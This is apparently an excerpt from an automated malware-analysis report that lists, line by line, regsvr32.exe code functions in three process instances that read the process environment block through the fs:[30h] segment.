Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEF47D4 mov ecx, dword ptr fs:[00000030h]	6_2_7EEF47D4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEF47D4 mov edx, dword ptr fs:[00000030h]	6_2_7EEF47D4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF407C8 mov ecx, dword ptr fs:[00000030h]	6_2_7EF407C8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF1AF60 mov eax, dword ptr fs:[00000030h]	6_2_7EF1AF60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEF8F30 mov edx, dword ptr fs:[00000030h]	6_2_7EEF8F30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEF8F30 mov ecx, dword ptr fs:[00000030h]	6_2_7EEF8F30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEF8F30 mov ecx, dword ptr fs:[00000030h]	6_2_7EEF8F30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEF6F1A mov eax, dword ptr fs:[00000030h]	6_2_7EEF6F1A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF05CD0 mov ecx, dword ptr fs:[00000030h]	6_2_7EF05CD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEF6C70 mov edx, dword ptr fs:[00000030h]	6_2_7EEF6C70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF02420 mov edx, dword ptr fs:[00000030h]	6_2_7EF02420
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF02420 mov eax, dword ptr fs:[00000030h]	6_2_7EF02420
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF1ADB0 mov edx, dword ptr fs:[00000030h]	6_2_7EF1ADB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEFE5A0 mov eax, dword ptr fs:[00000030h]	6_2_7EEFE5A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF27D90 mov ecx, dword ptr fs:[00000030h]	6_2_7EF27D90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF27D90 mov edx, dword ptr fs:[00000030h]	6_2_7EF27D90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF27D90 mov eax, dword ptr fs:[00000030h]	6_2_7EF27D90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF27D90 mov ecx, dword ptr fs:[00000030h]	6_2_7EF27D90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF1A560 mov ecx, dword ptr fs:[00000030h]	6_2_7EF1A560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF1A560 mov eax, dword ptr fs:[00000030h]	6_2_7EF1A560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF1A560 mov ecx, dword ptr fs:[00000030h]	6_2_7EF1A560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEF42E4 mov edx, dword ptr fs:[00000030h]	6_2_7EEF42E4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEF42E4 mov ecx, dword ptr fs:[00000030h]	6_2_7EEF42E4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEF72D0 mov edx, dword ptr fs:[00000030h]	6_2_7EEF72D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF19A90 mov eax, dword ptr fs:[00000030h]	6_2_7EF19A90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEF4280 mov edx, dword ptr fs:[00000030h]	6_2_7EEF4280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEF4280 mov ecx, dword ptr fs:[00000030h]	6_2_7EEF4280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEF4280 mov ecx, dword ptr fs:[00000030h]	6_2_7EEF4280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEF4280 mov ecx, dword ptr fs:[00000030h]	6_2_7EEF4280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEF4280 mov ecx, dword ptr fs:[00000030h]	6_2_7EEF4280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEF4280 mov edx, dword ptr fs:[00000030h]	6_2_7EEF4280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF1B260 mov ecx, dword ptr fs:[00000030h]	6_2_7EF1B260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF1B260 mov eax, dword ptr fs:[00000030h]	6_2_7EF1B260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF1B260 mov edx, dword ptr fs:[00000030h]	6_2_7EF1B260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF1B260 mov eax, dword ptr fs:[00000030h]	6_2_7EF1B260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF1B260 mov ecx, dword ptr fs:[00000030h]	6_2_7EF1B260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEFE250 mov edx, dword ptr fs:[00000030h]	6_2_7EEFE250
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF02A20 mov eax, dword ptr fs:[00000030h]	6_2_7EF02A20
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF47A0D mov eax, dword ptr fs:[00000030h]	6_2_7EF47A0D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF1D3E0 mov ecx, dword ptr fs:[00000030h]	6_2_7EF1D3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF1D3E0 mov eax, dword ptr fs:[00000030h]	6_2_7EF1D3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF1D3E0 mov ecx, dword ptr fs:[00000030h]	6_2_7EF1D3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF1D3E0 mov edx, dword ptr fs:[00000030h]	6_2_7EF1D3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF1D3E0 mov eax, dword ptr fs:[00000030h]	6_2_7EF1D3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF1E3A0 mov eax, dword ptr fs:[00000030h]	6_2_7EF1E3A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EEFD370 mov edx, dword ptr fs:[00000030h]	6_2_7EEFD370
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF28870 mov ecx, dword ptr fs:[00000030h]	6_2_7EF28870
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF28870 mov edx, dword ptr fs:[00000030h]	6_2_7EF28870
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF28870 mov eax, dword ptr fs:[00000030h]	6_2_7EF28870
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF28870 mov ecx, dword ptr fs:[00000030h]	6_2_7EF28870
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF0A800 mov ecx, dword ptr fs:[00000030h]	6_2_7EF0A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF0A800 mov ecx, dword ptr fs:[00000030h]	6_2_7EF0A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF0A800 mov eax, dword ptr fs:[00000030h]	6_2_7EF0A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF0A800 mov eax, dword ptr fs:[00000030h]	6_2_7EF0A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF0A800 mov eax, dword ptr fs:[00000030h]	6_2_7EF0A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF0A800 mov eax, dword ptr fs:[00000030h]	6_2_7EF0A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF0A800 mov eax, dword ptr fs:[00000030h]	6_2_7EF0A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF0A800 mov eax, dword ptr fs:[00000030h]	6_2_7EF0A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF0A800 mov eax, dword ptr fs:[00000030h]	6_2_7EF0A800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF479DC mov eax, dword ptr fs:[00000030h]	6_2_7EF479DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF1E1C0 mov edx, dword ptr fs:[00000030h]	6_2_7EF1E1C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF1E1B0 mov eax, dword ptr fs:[00000030h]	6_2_7EF1E1B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF47998 mov eax, dword ptr fs:[00000030h]	6_2_7EF47998
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF1C170 mov eax, dword ptr fs:[00000030h]	6_2_7EF1C170
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF0C160 mov edx, dword ptr fs:[00000030h]	6_2_7EF0C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF0C160 mov ecx, dword ptr fs:[00000030h]	6_2_7EF0C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF0C160 mov eax, dword ptr fs:[00000030h]	6_2_7EF0C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF0C160 mov eax, dword ptr fs:[00000030h]	6_2_7EF0C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF0C160 mov eax, dword ptr fs:[00000030h]	6_2_7EF0C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF0C160 mov eax, dword ptr fs:[00000030h]	6_2_7EF0C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF0C160 mov eax, dword ptr fs:[00000030h]	6_2_7EF0C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF0C160 mov edx, dword ptr fs:[00000030h]	6_2_7EF0C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_7EF0C160 mov eax, dword ptr fs:[00000030h]	6_2_7EF0C160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4FAF60 mov eax, dword ptr fs:[00000030h]	11_2_7F4FAF60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4D6F1A mov eax, dword ptr fs:[00000030h]	11_2_7F4D6F1A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4D8F30 mov edx, dword ptr fs:[00000030h]	11_2_7F4D8F30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4D8F30 mov ecx, dword ptr fs:[00000030h]	11_2_7F4D8F30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4D8F30 mov ecx, dword ptr fs:[00000030h]	11_2_7F4D8F30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4D47D4 mov ecx, dword ptr fs:[00000030h]	11_2_7F4D47D4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4D47D4 mov ecx, dword ptr fs:[00000030h]	11_2_7F4D47D4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4D47D4 mov edx, dword ptr fs:[00000030h]	11_2_7F4D47D4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F5207C8 mov ecx, dword ptr fs:[00000030h]	11_2_7F5207C8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4F7660 mov ecx, dword ptr fs:[00000030h]	11_2_7F4F7660
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F50F610 mov eax, dword ptr fs:[00000030h]	11_2_7F50F610
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4DD6C0 mov edx, dword ptr fs:[00000030h]	11_2_7F4DD6C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4F5EC0 mov ecx, dword ptr fs:[00000030h]	11_2_7F4F5EC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4D6E80 mov eax, dword ptr fs:[00000030h]	11_2_7F4D6E80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4FE690 mov ecx, dword ptr fs:[00000030h]	11_2_7F4FE690
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4F1EB0 mov eax, dword ptr fs:[00000030h]	11_2_7F4F1EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4F1EB0 mov edx, dword ptr fs:[00000030h]	11_2_7F4F1EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4F1EB0 mov eax, dword ptr fs:[00000030h]	11_2_7F4F1EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4F1EB0 mov eax, dword ptr fs:[00000030h]	11_2_7F4F1EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4F1EB0 mov eax, dword ptr fs:[00000030h]	11_2_7F4F1EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4F1EB0 mov eax, dword ptr fs:[00000030h]	11_2_7F4F1EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4F1EB0 mov eax, dword ptr fs:[00000030h]	11_2_7F4F1EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4F1EB0 mov ecx, dword ptr fs:[00000030h]	11_2_7F4F1EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4F1EB0 mov edx, dword ptr fs:[00000030h]	11_2_7F4F1EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4F1EB0 mov eax, dword ptr fs:[00000030h]	11_2_7F4F1EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4FA560 mov ecx, dword ptr fs:[00000030h]	11_2_7F4FA560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4FA560 mov eax, dword ptr fs:[00000030h]	11_2_7F4FA560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4FA560 mov ecx, dword ptr fs:[00000030h]	11_2_7F4FA560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F507D90 mov ecx, dword ptr fs:[00000030h]	11_2_7F507D90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F507D90 mov edx, dword ptr fs:[00000030h]	11_2_7F507D90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F507D90 mov eax, dword ptr fs:[00000030h]	11_2_7F507D90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F507D90 mov ecx, dword ptr fs:[00000030h]	11_2_7F507D90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4DE5A0 mov eax, dword ptr fs:[00000030h]	11_2_7F4DE5A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4FADB0 mov edx, dword ptr fs:[00000030h]	11_2_7F4FADB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4D6C70 mov edx, dword ptr fs:[00000030h]	11_2_7F4D6C70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4E2420 mov edx, dword ptr fs:[00000030h]	11_2_7F4E2420
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4E2420 mov eax, dword ptr fs:[00000030h]	11_2_7F4E2420
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4E5CD0 mov ecx, dword ptr fs:[00000030h]	11_2_7F4E5CD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4DD370 mov edx, dword ptr fs:[00000030h]	11_2_7F4DD370
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4FD3E0 mov ecx, dword ptr fs:[00000030h]	11_2_7F4FD3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4FD3E0 mov eax, dword ptr fs:[00000030h]	11_2_7F4FD3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4FD3E0 mov ecx, dword ptr fs:[00000030h]	11_2_7F4FD3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4FD3E0 mov edx, dword ptr fs:[00000030h]	11_2_7F4FD3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4FD3E0 mov eax, dword ptr fs:[00000030h]	11_2_7F4FD3E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4FE3A0 mov eax, dword ptr fs:[00000030h]	11_2_7F4FE3A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4DE250 mov edx, dword ptr fs:[00000030h]	11_2_7F4DE250
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4FB260 mov ecx, dword ptr fs:[00000030h]	11_2_7F4FB260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4FB260 mov eax, dword ptr fs:[00000030h]	11_2_7F4FB260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4FB260 mov edx, dword ptr fs:[00000030h]	11_2_7F4FB260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4FB260 mov eax, dword ptr fs:[00000030h]	11_2_7F4FB260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4FB260 mov ecx, dword ptr fs:[00000030h]	11_2_7F4FB260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F527A0D mov eax, dword ptr fs:[00000030h]	11_2_7F527A0D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4E2A20 mov eax, dword ptr fs:[00000030h]	11_2_7F4E2A20
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4D72D0 mov edx, dword ptr fs:[00000030h]	11_2_7F4D72D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4D42E4 mov edx, dword ptr fs:[00000030h]	11_2_7F4D42E4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4D42E4 mov ecx, dword ptr fs:[00000030h]	11_2_7F4D42E4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4D4280 mov edx, dword ptr fs:[00000030h]	11_2_7F4D4280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4D4280 mov ecx, dword ptr fs:[00000030h]	11_2_7F4D4280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4D4280 mov ecx, dword ptr fs:[00000030h]	11_2_7F4D4280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4D4280 mov ecx, dword ptr fs:[00000030h]	11_2_7F4D4280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4D4280 mov ecx, dword ptr fs:[00000030h]	11_2_7F4D4280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4D4280 mov edx, dword ptr fs:[00000030h]	11_2_7F4D4280
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4F9A90 mov eax, dword ptr fs:[00000030h]	11_2_7F4F9A90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4EC160 mov edx, dword ptr fs:[00000030h]	11_2_7F4EC160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4EC160 mov ecx, dword ptr fs:[00000030h]	11_2_7F4EC160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4EC160 mov eax, dword ptr fs:[00000030h]	11_2_7F4EC160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4EC160 mov eax, dword ptr fs:[00000030h]	11_2_7F4EC160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4EC160 mov eax, dword ptr fs:[00000030h]	11_2_7F4EC160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4EC160 mov eax, dword ptr fs:[00000030h]	11_2_7F4EC160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4EC160 mov eax, dword ptr fs:[00000030h]	11_2_7F4EC160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4EC160 mov edx, dword ptr fs:[00000030h]	11_2_7F4EC160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4EC160 mov eax, dword ptr fs:[00000030h]	11_2_7F4EC160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4FC170 mov eax, dword ptr fs:[00000030h]	11_2_7F4FC170
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F5279DC mov eax, dword ptr fs:[00000030h]	11_2_7F5279DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4FE1C0 mov edx, dword ptr fs:[00000030h]	11_2_7F4FE1C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F527998 mov eax, dword ptr fs:[00000030h]	11_2_7F527998
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4FE1B0 mov eax, dword ptr fs:[00000030h]	11_2_7F4FE1B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F508870 mov ecx, dword ptr fs:[00000030h]	11_2_7F508870
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F508870 mov edx, dword ptr fs:[00000030h]	11_2_7F508870
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F508870 mov eax, dword ptr fs:[00000030h]	11_2_7F508870
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F508870 mov ecx, dword ptr fs:[00000030h]	11_2_7F508870
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4EA800 mov ecx, dword ptr fs:[00000030h]	11_2_7F4EA800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4EA800 mov ecx, dword ptr fs:[00000030h]	11_2_7F4EA800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4EA800 mov eax, dword ptr fs:[00000030h]	11_2_7F4EA800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4EA800 mov eax, dword ptr fs:[00000030h]	11_2_7F4EA800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4EA800 mov eax, dword ptr fs:[00000030h]	11_2_7F4EA800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4EA800 mov eax, dword ptr fs:[00000030h]	11_2_7F4EA800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4EA800 mov eax, dword ptr fs:[00000030h]	11_2_7F4EA800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4EA800 mov eax, dword ptr fs:[00000030h]	11_2_7F4EA800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_7F4EA800 mov eax, dword ptr fs:[00000030h]	11_2_7F4EA800
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F176F1A mov eax, dword ptr fs:[00000030h]	14_2_7F176F1A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F178F30 mov edx, dword ptr fs:[00000030h]	14_2_7F178F30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F178F30 mov ecx, dword ptr fs:[00000030h]	14_2_7F178F30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F178F30 mov ecx, dword ptr fs:[00000030h]	14_2_7F178F30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F19AF60 mov eax, dword ptr fs:[00000030h]	14_2_7F19AF60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1747D4 mov ecx, dword ptr fs:[00000030h]	14_2_7F1747D4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1747D4 mov ecx, dword ptr fs:[00000030h]	14_2_7F1747D4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1747D4 mov edx, dword ptr fs:[00000030h]	14_2_7F1747D4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1C07C8 mov ecx, dword ptr fs:[00000030h]	14_2_7F1C07C8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1AF610 mov eax, dword ptr fs:[00000030h]	14_2_7F1AF610
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F197660 mov ecx, dword ptr fs:[00000030h]	14_2_7F197660
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F19E690 mov ecx, dword ptr fs:[00000030h]	14_2_7F19E690
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F176E80 mov eax, dword ptr fs:[00000030h]	14_2_7F176E80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F191EB0 mov eax, dword ptr fs:[00000030h]	14_2_7F191EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F191EB0 mov edx, dword ptr fs:[00000030h]	14_2_7F191EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F191EB0 mov eax, dword ptr fs:[00000030h]	14_2_7F191EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F191EB0 mov eax, dword ptr fs:[00000030h]	14_2_7F191EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F191EB0 mov eax, dword ptr fs:[00000030h]	14_2_7F191EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F191EB0 mov eax, dword ptr fs:[00000030h]	14_2_7F191EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F191EB0 mov eax, dword ptr fs:[00000030h]	14_2_7F191EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F191EB0 mov ecx, dword ptr fs:[00000030h]	14_2_7F191EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F191EB0 mov edx, dword ptr fs:[00000030h]	14_2_7F191EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F191EB0 mov eax, dword ptr fs:[00000030h]	14_2_7F191EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F17D6C0 mov edx, dword ptr fs:[00000030h]	14_2_7F17D6C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F195EC0 mov ecx, dword ptr fs:[00000030h]	14_2_7F195EC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F19A560 mov ecx, dword ptr fs:[00000030h]	14_2_7F19A560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F19A560 mov eax, dword ptr fs:[00000030h]	14_2_7F19A560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F19A560 mov ecx, dword ptr fs:[00000030h]	14_2_7F19A560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1A7D90 mov ecx, dword ptr fs:[00000030h]	14_2_7F1A7D90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1A7D90 mov edx, dword ptr fs:[00000030h]	14_2_7F1A7D90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1A7D90 mov eax, dword ptr fs:[00000030h]	14_2_7F1A7D90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F1A7D90 mov ecx, dword ptr fs:[00000030h]	14_2_7F1A7D90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F19ADB0 mov edx, dword ptr fs:[00000030h]	14_2_7F19ADB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F17E5A0 mov eax, dword ptr fs:[00000030h]	14_2_7F17E5A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F182420 mov edx, dword ptr fs:[00000030h]	14_2_7F182420
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F182420 mov eax, dword ptr fs:[00000030h]	14_2_7F182420
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F176C70 mov edx, dword ptr fs:[00000030h]	14_2_7F176C70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F185CD0 mov ecx, dword ptr fs:[00000030h]	14_2_7F185CD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 14_2_7F17D370 mov edx, dword ptr fs:[00000030h]	14_2_7F17D370
